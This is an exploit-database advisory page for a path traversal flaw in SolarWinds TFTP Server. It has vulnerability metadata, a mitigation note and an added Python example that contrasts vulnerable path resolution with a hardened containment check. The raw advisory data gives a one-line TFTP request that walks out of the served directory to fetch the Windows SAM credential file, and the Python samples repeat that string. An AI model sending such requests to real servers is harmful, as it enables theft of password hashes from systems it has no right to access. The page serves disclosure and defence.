SolarWinds TFTP Server Arbitrary File Retrieval Vulnerability - exploit.company
Vendor: TFTP Server
By: Unknown
CVSS: 5 (MEDIUM)
Arbitrary File Retrieval
CWE: 22
Product Name: TFTP Server
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2003-0361
CPE: a:solarwinds:tftp_server
Metasploit:
Other Scripts:
Platforms Tested: Windows
2003

SolarWinds TFTP Server Arbitrary File Retrieval Vulnerability

The SolarWinds TFTP Server does not properly handle user-supplied input. As a result, a remote user can request arbitrary files from the vulnerable server and download any file that is readable with the permissions of the TFTP Server user.

Mitigation:

Upgrade to a version not affected by this vulnerability. Using different TFTP server software is recommended.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6045/info

SolarWinds TFTP Server is distributed for the Microsoft Windows platform.

The SolarWinds TFTP Server does not properly handle user-supplied input. Due to insufficient handling of user input, it is possible for a remote user to request arbitrary files from the vulnerable server. It would be possible for a remote user to download any files readable through the permissions of the TFTP Server user.

tftp example.com GET a\..\..\winnt\repair\sam
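
The request above works because the file name is joined to the served directory and normalised without checking that the result is still inside that directory. The following is an added example, not SolarWinds code and not part of the original advisory: it shows that vulnerable resolution pattern beside a hardened check a TFTP server could apply to each requested name. The root path `C:\TFTP-Root` and all function names are assumptions made for illustration.

```python
import ntpath  # Windows path rules, importable on any OS

TFTP_ROOT = r"C:\TFTP-Root"  # assumed served directory (hypothetical)


class RejectedRequest(Exception):
    """Raised when a requested filename must not be served."""


def naive_resolve(root: str, requested: str) -> str:
    # Vulnerable pattern: join and normalise, never check containment.
    return ntpath.normpath(ntpath.join(root, requested))


def safe_resolve(root: str, requested: str) -> str:
    if not requested or any(ord(c) < 0x20 for c in requested):
        raise RejectedRequest("empty name or control character")
    # ':' covers drive letters and NTFS alternate data streams.
    if ":" in requested or requested[0] in "\\/":
        raise RejectedRequest("absolute, drive-qualified or UNC path")
    # Windows accepts both separators, so split on both before checking.
    if ".." in requested.replace("/", "\\").split("\\"):
        raise RejectedRequest("parent-directory component")
    # Defence in depth: the normalised result must still sit under root.
    base = ntpath.normcase(ntpath.normpath(root))
    candidate = ntpath.normpath(ntpath.join(root, requested))
    if ntpath.commonpath([base, ntpath.normcase(candidate)]) != base:
        raise RejectedRequest("resolves outside the TFTP root")
    return candidate


def is_allowed(requested: str, root: str = TFTP_ROOT) -> bool:
    try:
        safe_resolve(root, requested)
        return True
    except RejectedRequest:
        return False


if __name__ == "__main__":
    # Constructed sample requests: one benign, one from the advisory.
    for name in (r"configs\router.cfg", r"a\..\..\winnt\repair\sam"):
        print(f"{name!r}: naive -> {naive_resolve(TFTP_ROOT, name)!r}, "
              f"allowed = {is_allowed(name)}")
```

Running the service under an account that can read only the served directory limits the impact even if such a check is bypassed, since the advisory notes that exposure is bounded by the TFTP Server user's permissions.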